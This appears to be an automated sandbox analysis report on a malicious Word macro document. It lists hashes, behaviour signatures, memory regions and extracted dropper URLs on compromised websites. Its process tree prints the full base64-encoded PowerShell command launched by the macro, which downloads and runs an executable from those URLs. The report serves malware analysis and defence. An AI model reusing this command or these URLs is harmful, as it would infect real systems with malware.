Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
  • submitted
    04/05/2024, 02:24

General

  • Target

    113c78cca7bcb3422669ab5d30223d24_JaffaCakes118.doc

  • Size

    175KB

  • MD5

    113c78cca7bcb3422669ab5d30223d24

  • SHA1

    e687532ec20b9b3ffd5770b3cbcea45c4cd9516f

  • SHA256

    52b222374831f845dcf2ceb94ddf3a7e56ff1b2401ca994464a2cc99cbe60aec

  • SHA512

    e1c6e283b9336ef0fafda72e5731178384ac9165c23bba62aa5a1d66817ae056429096c938f20edc0ee82df66f95326489b06267b3bb942643ddbff5bd481412

  • SSDEEP

    3072:O9ufstRUUKSns8T00JSHUgteMJ8qMD7gTaBBGB4c:O9ufsfgIf0pLuBBGB4c

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://bonyanet.com/wp-admin/iR/

exe.dropper

http://ofoghzagros.com/wp-admin/H/

exe.dropper

https://ilinknepal.com/infosysnepal.com/Zdz/

exe.dropper

https://storypostar.com/wp-admin/j/

exe.dropper

https://www.pixelstoryteller.com/hydroplane-definition/wzb/

exe.dropper

https://redchillicrackers.com/wp-content/p/

exe.dropper

http://www.co-traveling.com/cgi-bin/003/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 9 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\113c78cca7bcb3422669ab5d30223d24_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2916
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1756
    • C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
      POwersheLL -ENCOD JABIAHMAdgBqADYAagBtAD0AKAAoACcASgA5ACcAKwAnAHQAJwApACsAJwBvAHIAJwArACcAXwA5ACcAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAGUAbgBWADoAVQBzAEUAcgBwAHIATwBmAGkAbABlAFwAdQBfADMAeQBCADQAcgBcAGoAMAA0AGEAZwA3AFoAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABpAFIAZQBjAHQAbwBSAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBDAGAAVQBSAGAASQB0AHkAUABSAGAATwBUAE8AYABjAG8AbAAiACAAPQAgACgAKAAnAHQAJwArACcAbABzACcAKQArACgAJwAxADIALAAgAHQAJwArACcAbAAnACsAJwBzADEAMQAsACcAKQArACcAIAAnACsAJwB0ACcAKwAnAGwAcwAnACkAOwAkAFoAZgBlADcAcgA4ADEAIAA9ACAAKAAoACcASQBiACcAKwAnAGYAZQAnACkAKwAoACcAOAAnACsAJwBiADYAJwApACsAJwA0ACcAKQA7ACQAWgA5ADMAYgAzAHAAZQA9ACgAJwBXACcAKwAoACcAdgAnACsAJwAwAGwAcgAyACcAKQArACcAdAAnACkAOwAkAFAAbQB1AGsAMQA1ADQAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcARAAnACsAKAAnAHkAZgBVACcAKwAnAF8AMwB5ACcAKwAnAGIAJwApACsAJwA0AHIAJwArACgAJwBEACcAKwAnAHkAZgBKADAANAAnACkAKwAnAGEAZwAnACsAJwA3ACcAKwAoACcAegBEACcAKwAnAHkAZgAnACkAKQAgAC0AcgBlAHAATABhAEMARQAgACgAWwBDAGgAQQBSAF0ANgA4ACsAWwBDAGgAQQBSAF0AMQAyADEAKwBbAEMAaABBAFIAXQAxADAAMgApACwAWwBDAGgAQQBSAF0AOQAyACkAKwAkAFoAZgBlADcAcgA4ADEAKwAoACcALgBlACcAKwAnAHgAZQAnACkAOwAkAFcAawBlAGoAYwBkAG4APQAoACcARQAnACsAKAAnADEAZQAnACsAJwAxAHUAbgBqACcAKQApADsAJABZAGEAbwBnAHcAbwB1AD0ALgAoACcAbgBlAHcALQBvAGIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIABuAEUAdAAuAFcAZQBiAEMAbABJAEUAbgB0ADsAJABUAGcAcwB0AHQAdgA3AD0AKAAoACcAaAAnACsAJwB0AHQAJwArACcAcAAnACsAJwA6AC8ALwBiAG8AbgB5AGEAbgBlACcAKwAnAHQALgBjAG8AbQAnACsAJwAvAHcAcAAtAGEAZABtACcAKwAnAGkAbgAvAGkAUgAvACcAKQArACcAKgBoACcAKwAoACcAdAAnACsAJwB0AHAAJwApACsAJwA6ACcAKwAoACcALwAvAG8AJwArACcAZgBvACcAKQArACcAZwBoACcAKwAoACcAegBhAGcAJwArACcAcgBvAHMALgBjAG8AJwArACcAbQAvAHcAJwArACcAcAAtAGEAJwApACsAKAAnAGQAbQBpAG4ALwAnACsAJwBIAC8AKgBoAHQAdABwACcAKwAnAHMAJwArACcAOgAvACcAKQArACgAJwAvAGkAJwArACcAbABpACcAKQArACgAJwBuAGsAbgAnACsAJwBlAHAAYQAnACkAKwAnAGwALgAnACsAKAAnAGMAJwArACcAbwBtAC8AJwApACsAKAAnAGkAbgAnACsAJwBmAG8AcwAnACsAJwB5AHMAJwArACcAbgBlAHAAYQAnACkAKwAoACcAbAAuACcAKwAnAGMAJwApACsAJwBvAG0AJwArACgAJwAvAFoAZAB6AC8AKgAnACsAJwBoACcAKwAnAHQAdABwACcAKQArACcAcwAnACsAJwA6AC8AJwArACcALwAnACsAKAAnAHMAdABvACcAKwAnAHIAeQBwACcAKwAnAG8AJwApACsAJwBzAHQAJwArACgAJwBhAHIAJwArACcALgBjACcAKQArACcAbwAnACsAJwBtACcAKwAoACcALwAnACsAJwB3AHAAJwApACsAJwAtAGEAJwArACgAJwBkACcAKwAnAG0AaQBuAC8AJwApACsAKAAnAGoALwAnACsAJwAqAGgAdAB0ACcAKQArACcAcABzACcAKwAoACcAOgAvAC8AJwArACcAdwB3AHcAJwArACcALgBwAGkAeABlAGwAcwAnACsAJwB0AG8AcgAnACkAKwAoACcAeQAnACsAJwB0ACcAKwAnAGUAbABsACcAKwAnAGUAcgAuAGMAbwBtAC8AaAB5AGQAcgAnACsAJwBvAHAAbABhAG4AJwApACsAKAAnAGUALQBkAGUAZgAnACsAJwBpAG4AaQAnACsAJwB0AGkAbwBuACcAKwAnAC8AdwB6AGIAJwArACcALwAqACcAKwAnAGgAdAAnACkAKwAoACcAdABwAHMAOgAnACsAJwAvACcAKwAnAC8AcgBlACcAKwAnAGQAYwBoAGkAbABsACcAKwAnAGkAYwByACcAKQArACgAJwBhAGMAJwArACcAawBlACcAKQArACgAJwByACcAKwAnAHMALgBjAG8AbQAnACsAJwAvAHcAJwApACsAKAAnAHAALQAnACsAJwBjACcAKwAnAG8AbgB0AGUAJwArACcAbgB0AC8AcAAnACkAKwAoACcALwAqAGgAJwArACcAdAAnACkAKwAnAHQAJwArACgAJwBwACcAKwAnADoALwAvAHcAJwArACcAdwB3ACcAKQArACcALgBjACcAKwAnAG8AJwArACgAJwAtAHQAJwArACcAcgBhAHYAZQAnACkAKwAoACcAbABpAG4AZwAuAGMAJwArACcAbwBtACcAKwAnAC8AYwAnACsAJwBnACcAKQArACgAJwBpAC0AYgBpAG4ALwAnACsAJwAwADAAMwAnACkAKwAnAC8AJwApAC4AIgBTAGAAcABsAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFUAbwA2AG0AdgA3AHcAPQAoACgAJwBLACcAKwAnADkAdwBvADAAJwApACsAJwBtADYAJwApADsAZgBvAHIAZQBhAGMAaAAoACQATwBiAHgAOQBkAHkAMQAgAGkAbgAgACQAVABnAHMAdAB0AHYANwApAHsAdAByAHkAewAkAFkAYQBvAGcAdwBvAHUALgAiAEQAYABvAGAAVwBOAEwAbwBgAEEARABGAGkAbABFACIAKAAkAE8AYgB4ADkAZAB5ADEALAAgACQAUABtAHUAawAxADUANAApADsAJABRAHMAYgAzADIAdQA0AD0AKAAoACcATwAxACcAKwAnADcAJwApACsAKAAnAGIAJwArACcAawBvADgAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJAHQAZQAnACsAJwBtACcAKQAgACQAUABtAHUAawAxADUANAApAC4AIgBMAGAAZQBOAGAAZwBUAGgAIgAgAC0AZwBlACAAMgA5ADgANQAxACkAIAB7ACYAKAAnAEkAbgB2ACcAKwAnAG8AawBlAC0ASQB0ACcAKwAnAGUAJwArACcAbQAnACkAKAAkAFAAbQB1AGsAMQA1ADQAKQA7ACQASQB0AGQANwBnAGIAXwA9ACgAJwBRACcAKwAoACcANgBmAHIAJwArACcAMAAnACkAKwAnAGMANQAnACkAOwBiAHIAZQBhAGsAOwAkAFYAZABjAGwAcgA4AGoAPQAoACcAWgAnACsAKAAnADMANgAnACsAJwBhAHUAaAAnACkAKwAnAGEAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABEAGMAeAA0ADIAbwBxAD0AKAAnAEIAJwArACcAZABlACcAKwAoACcAegB5AHAAJwArACcAdgAnACkAKQA=
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2416

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      dac0169a3af70cbd9c7948599094d79e

      SHA1

      df29e600aa7b3dcc8220ec08aa6265f7b2e9750e

      SHA256

      23c8e0ed50c2d29d7d18354ae840b70a5b7b27d65269e00f6b47db9b8fb8bb5e

      SHA512

      5ea0e67903af15f1b470c2f85a3dd82d5b19f2d9513e7bd33efd07c5c03e9723699c794be0438c870a77cbd07e0e329288032a9e56f3ec0cad6f8e030d2a3d24

    • memory/2416-44-0x000000001B760000-0x000000001BA42000-memory.dmp

      Filesize

      2.9MB

    • memory/2416-45-0x0000000001C90000-0x0000000001C98000-memory.dmp

      Filesize

      32KB

    • memory/2916-19-0x0000000000300000-0x0000000000400000-memory.dmp

      Filesize

      1024KB

    • memory/2916-17-0x0000000000300000-0x0000000000400000-memory.dmp

      Filesize

      1024KB

    • memory/2916-8-0x0000000005D00000-0x0000000005E00000-memory.dmp

      Filesize

      1024KB

    • memory/2916-9-0x0000000000300000-0x0000000000400000-memory.dmp

      Filesize

      1024KB

    • memory/2916-11-0x0000000000300000-0x0000000000400000-memory.dmp

      Filesize

      1024KB

    • memory/2916-15-0x0000000000300000-0x0000000000400000-memory.dmp

      Filesize

      1024KB

    • memory/2916-12-0x0000000000300000-0x0000000000400000-memory.dmp

      Filesize

      1024KB

    • memory/2916-10-0x0000000000300000-0x0000000000400000-memory.dmp

      Filesize

      1024KB

    • memory/2916-13-0x0000000000300000-0x0000000000400000-memory.dmp

      Filesize

      1024KB

    • memory/2916-22-0x0000000000300000-0x0000000000400000-memory.dmp

      Filesize

      1024KB

    • memory/2916-16-0x0000000000300000-0x0000000000400000-memory.dmp

      Filesize

      1024KB

    • memory/2916-21-0x0000000000300000-0x0000000000400000-memory.dmp

      Filesize

      1024KB

    • memory/2916-28-0x0000000000300000-0x0000000000400000-memory.dmp

      Filesize

      1024KB

    • memory/2916-27-0x0000000000300000-0x0000000000400000-memory.dmp

      Filesize

      1024KB

    • memory/2916-20-0x0000000000300000-0x0000000000400000-memory.dmp

      Filesize

      1024KB

    • memory/2916-0-0x000000002F2A1000-0x000000002F2A2000-memory.dmp

      Filesize

      4KB

    • memory/2916-7-0x0000000000300000-0x0000000000400000-memory.dmp

      Filesize

      1024KB

    • memory/2916-18-0x0000000000300000-0x0000000000400000-memory.dmp

      Filesize

      1024KB

    • memory/2916-24-0x0000000000300000-0x0000000000400000-memory.dmp

      Filesize

      1024KB

    • memory/2916-14-0x0000000000300000-0x0000000000400000-memory.dmp

      Filesize

      1024KB

    • memory/2916-34-0x0000000000300000-0x0000000000400000-memory.dmp

      Filesize

      1024KB

    • memory/2916-37-0x0000000000300000-0x0000000000400000-memory.dmp

      Filesize

      1024KB

    • memory/2916-33-0x0000000000300000-0x0000000000400000-memory.dmp

      Filesize

      1024KB

    • memory/2916-32-0x0000000000300000-0x0000000000400000-memory.dmp

      Filesize

      1024KB

    • memory/2916-31-0x0000000000300000-0x0000000000400000-memory.dmp

      Filesize

      1024KB

    • memory/2916-38-0x0000000000300000-0x0000000000400000-memory.dmp

      Filesize

      1024KB

    • memory/2916-6-0x0000000000300000-0x0000000000400000-memory.dmp

      Filesize

      1024KB

    • memory/2916-2-0x000000007100D000-0x0000000071018000-memory.dmp

      Filesize

      44KB

    • memory/2916-50-0x000000007100D000-0x0000000071018000-memory.dmp

      Filesize

      44KB

    • memory/2916-52-0x0000000000300000-0x0000000000400000-memory.dmp

      Filesize

      1024KB

    • memory/2916-70-0x0000000000300000-0x0000000000400000-memory.dmp

      Filesize

      1024KB

    • memory/2916-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2916-91-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2916-92-0x000000007100D000-0x0000000071018000-memory.dmp

      Filesize

      44KB